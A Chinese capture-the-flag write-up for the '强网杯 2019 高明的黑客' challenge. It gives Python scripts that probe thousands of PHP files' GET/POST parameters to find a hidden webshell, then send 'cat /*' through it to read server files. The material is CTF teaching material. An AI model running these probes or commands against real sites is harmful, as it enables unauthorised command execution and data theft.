
雁过留声,人过留名,此网站已被黑
我也是很佩服你们公司的开发,特地备份了网站源码到www.tar.gz以供大家观赏

根据提供的网站源码我们可以看到有几千个php文件,每个php文件中又有很多$_GET和$_POST数组,估计就是要我们找到webshell了

这个题目考察的就是我们写脚本的能力

import asyncio
import os
import re

import aiohttp

# Base URL of the challenge instance (redacted in the writeup).
URL = "https://xxxxxxxxx/"
# Local directory holding the downloaded site source.
Path = "[强网杯 2019]高明的黑客/src/"

# Bounds how many requests may be in flight at once.
SEM = asyncio.Semaphore(value=20)
# Every file in the source directory is a candidate to examine.
files = os.listdir(Path)


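async def get_post(file):
    """Return the ``$_GET`` / ``$_POST`` parameter names read by one PHP file.

    Declared ``async`` only so that ``solve()`` can ``await`` it; the file
    read itself is ordinary blocking I/O.

    Args:
        file: file name relative to the module-level ``Path`` directory.

    Returns:
        A ``(get, post)`` tuple of lists of parameter names, in source order.

    Raises:
        OSError: if the file cannot be opened.
    """
    # Explicit encoding: the default is locale-dependent, and one file with
    # bytes that do not decode would otherwise abort the whole scan with
    # UnicodeDecodeError. The patterns below only match ASCII tokens, so
    # undecodable bytes can safely be replaced instead of raised.
    with open(Path + file, encoding="utf-8", errors="replace") as f:
        content = f.read()
    # Names quoted with ' or " inside $_GET[...] / $_POST[...].
    get = re.findall(r"\$_GET\[[\'\"](.*?)[\'\"]\]", content)
    post = re.findall(r"\$_POST\[[\'\"](.*?)[\'\"]\]", content)
    return get, post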


async def check(session, file, params, data):
    """Request one file and report whether the marker string came back.

    Args:
        session: an open ``aiohttp.ClientSession``.
        file: file name appended to the module-level ``URL``.
        params: query-string values, one per ``$_GET`` name.
        data: form-body values, one per ``$_POST`` name.

    Returns:
        ``[file, params, data]`` when the response body contains the
        ``"xxxxxxxx"`` marker, otherwise ``None``.
    """
    # SEM caps the number of simultaneous requests across all tasks.
    async with SEM:
        target = URL + file
        async with session.post(target, data=data, params=params) as rq:
            body = await rq.text()
    # The same literal marker travels in every request, which is what makes
    # this probe easy to pick out in server-side request logs.
    if "xxxxxxxx" not in body:
        return None
    return [file, params, data]


async def solve():
    """Scan every file in ``files`` and print the ones that echo the marker.

    One task per file is started up front; results are then awaited and
    printed in file order.
    """
    async with aiohttp.ClientSession() as session:
        marker = "echo 'xxxxxxxx';"
        pending = []
        for name in files:
            get_names, post_names = await get_post(name)
            # Every discovered name receives the same marker value.
            query = {key: marker for key in get_names}
            body = {key: marker for key in post_names}
            pending.append(asyncio.create_task(check(session, name, query, body)))
        for task in pending:
            hit = await task
            if hit:
                print(*hit)


if __name__ == "__main__":
    # Entry point: run the asynchronous scan to completion.
    asyncio.run(solve())

这里我们使用一个 echo 命令来判断是否存在 RCE,运行后的输出如下:

xk0SzyKwfzw.php {'z5c_TrB': "echo 'xxxxxxxx';", 'xd0UXc39w': "echo 'xxxxxxxx';", 'DdWk_nXmZTF_Dt': "echo 'xxxxxxxx';", 'dthxTqRPg8YtH': "echo 'xxxxxxxx';", 'I
mPVuGCXfrS': "echo 'xxxxxxxx';", 'O0yRgyjaOF7m': "echo 'xxxxxxxx';", 'DeMcscsp': "echo 'xxxxxxxx';", 'YV8nqJDhD': "echo 'xxxxxxxx';", 'EMNPxS2A7': "echo 'xxxx
xxxx';", 'kBVLzQEgb': "echo 'xxxxxxxx';", 'Efa5BVG': "echo 'xxxxxxxx';", 'i_QfWB2x1': "echo 'xxxxxxxx';", 'E8NPXbr7Cq': "echo 'xxxxxxxx';", 'zfEddFlxaK_FTO3A'
: "echo 'xxxxxxxx';", 'qjWSY5fjcgNtb': "echo 'xxxxxxxx';", 'qUVRuZTF27EhUKTI': "echo 'xxxxxxxx';"} {'sDCPHvsvwWo': "echo 'xxxxxxxx';", 'V5th2o3Pea_6O': "echo
'xxxxxxxx';", 'amQ2A0SPU': "echo 'xxxxxxxx';", 'riZH5vvoY': "echo 'xxxxxxxx';", 'ZCBPLk': "echo 'xxxxxxxx';", 'wWMgYch': "echo 'xxxxxxxx';", 'Detx3g1SfCf': "e
cho 'xxxxxxxx';", 'tastJGHA5De': "echo 'xxxxxxxx';", 'fgUPcHJZvkq': "echo 'xxxxxxxx';", 'ppiJIyg': "echo 'xxxxxxxx';", 'KtpWfYB': "echo 'xxxxxxxx';"}

发现这里有很多参数,并不确定是哪一个,那就给每个参数都赋值为要执行的命令,看回显就行了

import re

import requests

# Local copy of the single PHP file singled out by the earlier scan.
Path = "[强网杯 2019]高明的黑客/src/xk0SzyKwfzw.php"
# Value placed in every discovered parameter of the request.
cmd = "cat /*"
# Base URL of the challenge instance as given in the writeup.
URL = "https://e5237c09538dd5b42243d709.http-ctf2.dasctf.com/"


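def get_post(file):
    """Return the ``$_GET`` / ``$_POST`` parameter names read by a PHP file.

    Args:
        file: path of the PHP source file to scan.

    Returns:
        A ``(get, post)`` tuple of lists of parameter names, in source order.

    Raises:
        OSError: if the file cannot be opened.
    """
    # Explicit encoding so decoding does not depend on the locale; the
    # patterns below only match ASCII tokens, so undecodable bytes are
    # replaced instead of raising UnicodeDecodeError.
    with open(file, encoding="utf-8", errors="replace") as f:
        content = f.read()
    # Names quoted with ' or " inside $_GET[...] / $_POST[...].
    get = re.findall(r"\$_GET\[[\'\"](.*?)[\'\"]\]", content)
    post = re.findall(r"\$_POST\[[\'\"](.*?)[\'\"]\]", content)
    return get, post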


# Parameter names found in the one file identified by the earlier scan.
get, post = get_post(Path)
# Every name, query-string and form-body alike, receives the same value.
param = {name: cmd for name in get}
data = {name: cmd for name in post}

response = requests.post(URL + "xk0SzyKwfzw.php", params=param, data=data)
print(response.text)